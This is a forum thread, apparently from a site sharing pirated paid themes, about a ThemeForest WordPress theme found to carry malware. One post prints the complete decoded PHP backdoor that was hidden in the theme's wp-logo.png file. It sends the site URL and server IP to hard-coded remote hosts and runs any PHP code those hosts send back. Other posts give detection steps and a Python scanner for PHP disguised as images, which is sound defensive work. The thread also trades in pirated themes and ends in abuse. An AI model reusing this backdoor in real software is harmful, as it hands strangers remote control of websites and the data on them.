06-17-2014, 12:22 PM
(This post was last modified: 06-17-2014 12:23 PM by SArena.)
Post: #11
RE:
06-17-2014, 12:27 PM
(This post was last modified: 06-17-2014 12:33 PM by iapetos.)
Post: #12
RE:
try {
    // Hard-coded callback endpoints
    $serverUrl = array(
        "96wn.com/transit.php",
        "64tj.com/transit.php",
        "ugo3.com/transit.php",
    );
    $domainPackVersion = 1;
    if (array_key_exists('SERVER_ADDR', $_SERVER))
        $ip = $_SERVER['SERVER_ADDR'];
    elseif (array_key_exists('LOCAL_ADDR', $_SERVER))
        $ip = $_SERVER['LOCAL_ADDR'];
    elseif (array_key_exists('SERVER_NAME', $_SERVER))
        $ip = gethostbyname($_SERVER['SERVER_NAME']);
    else {
        if (stristr(PHP_OS, 'WIN')) {
            $ip = gethostbyname(php_uname("n"));
        } else {
            $ifconfig = shell_exec('/sbin/ifconfig eth0');
            preg_match('/addr:([\d\.]+)/', $ifconfig, $match);
            $ip = $match[1];
        }
    }
    $currentUrl = rtrim('http'.(empty($_SERVER['HTTPS'])?'':'s').'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/');
    // Site URL and server IP are sent with every callback
    $data = array(
        "url" => $currentUrl,
        "ip" => $ip,
        "domainPackVersion" => $domainPackVersion,
        "failedDomains" => array(),
    );
    $failedRequest = true;
    $failCounter = 0;
    $sockSuccess = false;
    $urlKey = rand(0, count($serverUrl)-1);
    $subDomain = rand(0, 10);
    while (!$sockSuccess) {
        $result = "";
        $url = parse_url("http://api".$subDomain.".".$serverUrl[$urlKey]);
        $host = $url["host"];
        $path = (!empty($url["path"])) ? $url["path"] : '';
        $fp = fsockopen($host, 80, $errno, $errstr, 1);
        $dataQuery = http_build_query($data);
        if ($fp) {
            fputs($fp, "POST $path HTTP/1.1".PHP_EOL);
            fputs($fp, "Host: $host".PHP_EOL);
            fputs($fp, "Content-type: application/x-www-form-urlencoded".PHP_EOL);
            fputs($fp, "Content-length: ".strlen($dataQuery).PHP_EOL);
            fputs($fp, "Connection: close".PHP_EOL.PHP_EOL);
            fputs($fp, $dataQuery);
            while (!feof($fp))
                $result .= fgets($fp, 128);
            $code = substr($result,9,3);
            fclose($fp);
            if (is_numeric($code) && $code==="200") {
                break;
            }
        }
        if ($failedRequest) {
            $failCounter++;
            $data['failedDomains'][] = $serverUrl[$urlKey];
            array_splice($serverUrl,$urlKey, 1);
            if (!empty($serverUrl) && $failCounter<2) {
                $subDomain = rand(0, 10);
                $urlKey = rand(0, count($serverUrl)-1);
            } else
                break;
        }
    }
    // Whatever follows 'result=' in the response is executed as PHP
    if (!empty($result) && strpos($result, 'result=')!==false) {
        $temp = explode('result=', $result, 2);
        if (isset($temp[1])) {
            @eval($temp[1]);
        }
    }
} catch (Exception $e) { }

I really doubt Envato, who is out of Australia and never uses private whois, suddenly decided to insert this code with ties to a private registration out of Panama.
06-17-2014, 12:37 PM
Post: #13
RE:
the function.php code
line 139
if (get_option('wpb_js_templates', "") == "") {
    $saved = wp_remote_get(get_template_directory_uri().'/admin/pages/saved.txt');
    $import_code = base64_decode($saved['body']);
    update_option( 'wpb_js_templates', unserialize($import_code), '', 'yes' );
}
has base64_decoded. I also need some expert advice, is this safe? Thanks
06-17-2014, 12:43 PM
Post: #14
RE:
That function just imports the demo content. That part is ok. However the part I posted is an infection disguised as the wp-logo.png file.
06-17-2014, 12:48 PM
Post: #15
RE:
Thanks iapetos for the advice
VirusTotal scan shows 1 threat
https://www.virustotal.com/ro/file/ef130.../analysis/
Detection ratio: 1 / 53
06-17-2014, 12:57 PM
Post: #16
RE:
Hope this helps other users
Steps to detect:
open wp-logo.png with Notepad++
copy the entire code and paste it on http://ddecode.com/phpdecoder/
and get the code as in post 12 by iapetos
Conclusion: for sure it is not safe
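Added example, not part of the thread or any poster's code: a Python check for the pattern described in posts 14 and 16, PHP disguised as an image file inside a theme. The function names, the marker list and the constructed sample files are assumptions for illustration.

```python
import os
import re
import tempfile

# Leading magic bytes for the image types a theme normally ships.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Byte patterns that have no business inside an image (assumed marker list).
SUSPICIOUS = re.compile(
    rb"<\?php|\beval\s*\(|base64_decode\s*\(|gzinflate\s*\(|fsockopen\s*\(", re.I)


def inspect_image(path):
    """Return the reasons why `path` does not look like a real image."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    reasons = []
    if not data.startswith(MAGIC[ext]):
        reasons.append("header does not match " + ext)
    hit = SUSPICIOUS.search(data)  # also catches PHP appended to a valid image
    if hit:
        reasons.append("contains " + hit.group(0).decode("ascii", "replace"))
    return reasons


def scan_theme(root):
    """Walk a theme directory; map each suspicious image path to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in MAGIC:
                full = os.path.join(dirpath, name)
                reasons = inspect_image(full)
                if reasons:
                    findings[os.path.relpath(full, root)] = reasons
    return findings


def demo():
    """Constructed sample: a real PNG header and a text file renamed to .png."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "real.png"), "wb") as fh:
            fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
        with open(os.path.join(root, "wp-logo.png"), "wb") as fh:
            fh.write(b"<?php eval(base64_decode('PLACEHOLDER')); ?>")
        return scan_theme(root)
```

Run `scan_theme()` on an unpacked theme before uploading it; any file it reports should be opened in a text editor and never included or executed.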
06-17-2014, 01:12 PM
(This post was last modified: 06-17-2014 01:14 PM by cabaniss34.)
Post: #17
RE:
Someone please post a clean version, or do we just remove the image in the documentation, then it should be fine, correct ???
(06-17-2014 12:57 PM)fsnsh6 Wrote:
06-17-2014, 01:40 PM
(This post was last modified: 06-17-2014 01:40 PM by Batmans.)
Post: #18
RE:
Sarena. How is this script purchased and infected at the same time? IF this is the case then you need your sorry *SS banned and kicked. So which is it?
06-17-2014, 01:43 PM
(This post was last modified: 06-17-2014 02:18 PM by SArena.)
Post: #19
RE:
Don't be rude. Not my purchase, I only posted what has been posted on a site. If it was my purchase I would say so. You can see all my other files I posted, all purchased by me. This was not mine, it was a unique theme and I posted it from a site.
06-17-2014, 01:51 PM
Post: #20
RE:
IF you did not purchase it then it should NOT say....
[GET] ThemeForest - PRO Business - Responsive Multi-Purpose Theme [PURCHASED]
Implying that YOU purchased it you lying piece of *hit! Don't say you purchased it and mislead members into thinking this is a legit post when your sorry lying a** knows good and well you infected it. *****. Take that shit somewhere else.